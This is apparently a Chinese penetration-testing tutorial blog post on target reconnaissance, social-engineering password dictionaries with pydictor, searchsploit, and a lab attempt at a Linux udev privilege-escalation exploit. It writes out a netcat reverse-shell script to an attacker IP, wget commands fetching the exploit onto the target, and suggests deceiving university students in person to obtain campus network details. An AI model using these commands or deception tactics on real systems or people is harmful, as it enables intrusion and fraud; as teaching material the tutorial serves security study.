信息收集--关联信息及漏洞情报
关联信息生成和开放漏洞情报
- 一、关联信息生成
- 1.字典生成
- 二、开放漏洞情报
- 1.常用网站
- 2.Search Exploit-DB
- 示例
- 试一试实例
- 1. 查找漏洞
- 2. 本地 kali 中搭建 Apache 服务器
- 3. exp 上传到靶机中
- 4.编译执行
一、关联信息生成
在渗透前期工作开展之前,需要对目标的各种信息进行分析、拆分、组合。
例如:华南师范大学
根据地域习惯、宗教、互联网开放信息等信息进行简要拆分,假设获取的信息如下:
- 广东人有祭祖习惯
- 广东人口味清淡
- 华师学生比较乖、低调、老实本分型,可以线下进行诱导欺骗从而获得校内网ip
- IPV4地址开放lP段
- 相关社交网络公开的数据库
- 校园论坛
根据宗教、习惯、IP地址、开放数据支持…等,为后续的字典生成、鱼叉、水坑攻击铺下基石。
1.字典生成
pydictor
- 安装:
$ git clone https://github.com/LandGrey/pydictor
- 生成字典
$ cd pydictor
$ python pydictor.py
快速使用:https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md
社会工程学字典:python pydictor.py --sedb
配置选项,然后查看当前配置然后生成字典
set cname liwei
set birth 19880916
show
run
$ vi sedb_153951.txt
- 合并去重
$ python pydictor.py -tool uniqbiner /my/all/dict/
$ mkdir ./tmp
$ mv 1.txt 3.txt ./tmp/
$ python pydictor.py -tool uniqbiner ./tmp/
- 多字典文件组合工具
$ python pydictor.py -tool hybrider heads.txt some_others.txt tails.txt
$ mv * ../
在tmp文件夹下移动当前文件夹下的所有文件到上一级目录
$ python pydictor.py -tool hybrider 1.txt 3.txt
二、开放漏洞情报
1.常用网站
- CVE #通用漏洞披露
- Exploit-DB #漏洞提交平台
- Cx Security #漏洞数据库
- CNVD #国家信息安全漏洞共享平台
- securitytracker #漏洞数据库
- github #开源及私有软件项目的托管平台
- seebug #知道创宇漏洞数据库
- exploits.shodan.io
2.Search Exploit-DB
kail自带
$ searchsploit
示例
- 搜索Windows提权漏洞
$ searchsploit -t windows local
- 搜索Apache漏洞
$ searchsploit -t Apache
实际操作可以看看这个
searchsploit工具(exploit-db.com)使用实例:https://blog.csdn.net/whatday/article/details/102821589
试一试实例
1. 查找漏洞
搜索 privilege,然后使用 grep 命令来缩小查找范围,加上 -i 参数忽略大小写
$ searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
使用 8572.c 这个exp,它利用了 UDEV 设备管理器中的一个漏洞,允许通过未经验证的 Netlink 消息来执行代码
linux/local/8572.c
使用 locate 命令来查找完整的路径
$ locate linux/local/8572.c
/usr/share/exploitdb/exploits/linux/local/8572.c
2. 本地 kali 中搭建 Apache 服务器
执行以下命令
$ service apache2 restart
测试
在浏览器中输入localhost测试Apache是否配置成功
3. exp 上传到靶机中
在服务器文件目录下建立 exp 所在位置的符号链接,这样 exp 才可以下载
执行以下命令
$ ln -s /usr/share/exploitdb/exploits/linux/local/ /var/www/html/
使用nano /var/www/html/run 命令来创建一个文件并输入下面内容:
#! /bin/bash
nc 192.168.70.11 4321 -e /bin/bash
按Ctrl+X
如果你修改了文件,下面会询问你是否需要保存修改。输入Y确认保存,输入N不保存,按Ctrl+C取消返回。
如果输入了Y,下一步会让你输入想要保存的文件名。如果不需要修改文件名直接回车就行;若想要保存成别的名字(也就是另存为则输入新名称然后确定。这个时候也可用Ctrl+C来取消返回。
我们使用 Ctrl-X, Y, 和 Enter 进行保存
将 exp 上传到靶机
$ cd /tmp
$ wget http://192.168.70.11/run
$ wget http://192.168.70.11/local/8572.c
4.编译执行
使用 gcc 命令,使用 -o 参数来指定输出文件的名字
$ gcc -o exploit 8572.c
使用 -B 参数来指定链接器的位置
$ gcc -B /usr/bin -o exploit 8572.c
使用 ls 命令来查看可执行文件是否已经成功编译
$ ls
找到 Netlink 套接字的 PID
$ cat /proc/net/netlink
使用 ps aux | grep udev 来查看 UDEVD 的 PID
$ ps aux | grep udev
把PID减去1之后运行,发现不行,再仔细找了一下,啊哈哈,我Ubuntu好像没有这个本地漏洞
不管了,接下来就是开启监听
$ nc -lvp 4321
如果有这个漏洞,监听之后应该是这样的
nc -lvp 4321
listening on [any] 4321 ...
192.168.70.144: inverse host lookup failed: Unknown host
connect to [192.168.70.11] from (UNKNOWN) [192.168.70.144] 34418
id
uid=0(root) gid=0(root)
whoami
root
回头看了一下,我Ubuntu版本太高了,这就尴尬了…
$ uname -a
$ lsb_release -a
信息收集--关联信息及漏洞情报相关推荐
- 在线渗透测试网址信息收集网站-密码工具-漏洞查找平台-安全视频平台
在线渗透测试网址信息收集网站 http://tool.chinaz.com/nslookup/ - 在线NSLOOKUP http://whois.chinaz.com/- 站长工具:whois ht ...
- Windows提权基础:信息收集技巧及可用漏洞搜索
本文收集整理一些跟提权紧密相关的信息收集技巧和方法,以及如何在kali中搜索可用的漏洞,最后整理了目前可供使用的一些漏洞对应msf下的模块以及操作系统可提权的版本. 0X00 Windows提权信息收 ...
- 信息收集-服务器信息
服务器上面可以运行大量的系统服务和第三方应用服务,如果操作系统或者第三方软件没有及时升级打补丁,攻击者就有可能直接通过服务器上运行的服务进行攻击. 服务器需要收集的信息包含三个方面: 操作系统信息等识 ...
- 被动信息收集:信息收集内容、信息用途、信息收集DNS、DNS信息收集-NSLOOKUP
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋ ┃被动信息收集 ┃ ┃ 公开渠道可获得的信息 ┃ ┃ 与目标系统不产生直接交互 ┃ ┃ 尽量避免留下一切痕迹 ┃ ...
- 信息收集--IP信息收集
0x01 发现IP 在实际的渗透测试过程中,我们的目标可能只是一个域名或者某个公司组织的名字.这时,我们就需要通过一个人域名或组织的名称来确定目标所在的真实IP.这里我们先不考虑目标是否使用了CDN, ...
- 查看gcc版本信息和关联信息的命令
1.查看gcc g++的版本以及其链接的信息:ls /usr/bin/gcc* -l ls /usr/bin/g++* -l 2.如果本系统安装有多个版本的gcc,g++,想用哪个版本直接更改链接即可 ...
- Waf攻防-信息收集漏洞发现漏洞利用权限控制
目录 WAF的介绍 1.什么是WAF 2.WAF的分类 软件型WAF 硬件型WAF 云 WAF 网站内置的WAF 3.WAF的判断 WAF的绕过 1.信息收集 介绍 信息收集常见检测 信息收集绕过wa ...
- web漏洞之需要准备的工作:信息收集
目录 一.信息收集 1.信息收集与社工溯源 2.信息收集总览 1.DNS 2.子域名[主要方式] 3.C段[目前退出历史舞台] 4.邮箱 5.指纹 6.社工库 7.钓鱼攻击 3.DNS介绍 1.Dom ...
- 被动与主动信息收集 | 系统性学习 | 无知的我费曼笔记
文章目录 信息收集-被动信息收集介绍 收集手段 收集内容 信息用途 信息收集-域名解析过程以手段 域名解析过程 信息收集 DNS **DNS 信息收集-NSLOOKUP** **DNS 信息收集-DI ...
最新文章
- python的模块和类_Python模块和类.md
- c++ winpcap开发(2)
- showModalDialog模态对话框 的使用及一般问题的解决
- 二维声波方程的有限差分法数值模拟
- windows文件(.txt,.h,.cpp等等)中的中文在ubuntu下乱码的解决方法
- centos7 安装pip
- Shell脚本学习-阶段二十六-Web服务与端口
- kindle3 破解字体
- git 版本控制库的用法及其介绍
- wine QQ安装笔记
- 计算机蓝屏原因原理,蓝屏炸弹
- 为什么正常单据记账没有数据_正常单据记账中找不到记账单据
- 机甲大师s1 python编程_机甲大师RoboMaster S1教育机器人- DJI 大疆创新
- python密码安全性检查代码
- 2022-JavaScript-过滤数组中的undefined,null,空串,NaN
- 网页上的内容无法选中复制该如何解决?
- XCTF-mobile app3
- android 获取sn序列号
- Pixel 手机遇到问题记录
- dataframe格式知识点总结
热门文章
- Xmind 8 pro 软件破解版(重点推荐)
- python爬虫58同城租房
- 笔记本电脑频繁假死的一个解决办法
- 手机怎么压缩图片?分享一下压缩的好方法
- XYplorer 23多语言,最好的管理软件之一
- 实用工具系列 - FileZilla安装下载与使用
- python时间序列平稳性检验_Python量化投资基础:时间序列的平稳性检验
- MAC 解压 rar 文件
- 《文明之光》第六章读书笔记
- macbook双系统怎么装mysql_mac装win10双系统的方法_如何安装macos苹果和win10双系统...